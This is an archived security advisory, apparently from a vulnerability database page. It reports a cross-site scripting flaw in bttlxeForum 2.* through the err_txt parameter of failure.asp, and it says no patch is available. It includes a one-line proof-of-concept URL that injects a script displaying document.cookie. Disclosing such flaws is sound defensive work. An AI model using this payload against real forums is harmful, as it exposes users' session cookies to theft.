Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:11644
HistoryMar 01, 2006 - 12:00 a.m.

bttlxeForum 2.* XSS Vulnerability

2006-03-0100:00:00
vulners.com
3

--------------------Summary----------------
Software: bttlxeForum
Sowtware's Web Site: http://www.bttlxe.com/
Versions: 2.*
Type: Cross-Site Scripting
Class: Remote
Exploit: Available
Solution: Not Available
Discovered by: runvirus
(worlddefacers.de securitycentra.com)
-----------------Description---------------
Vulnerable Script: failure.asp
--------------Exploit----------------------
http://www.example.comforums/failure.asp?err_txt=<script>alert(document.cookie);</script>
--------------Solution---------------------
No Patch available.

--------------Credit-----------------------
Discovered by: runvirus
(worlddefacers.de securitycentra.com)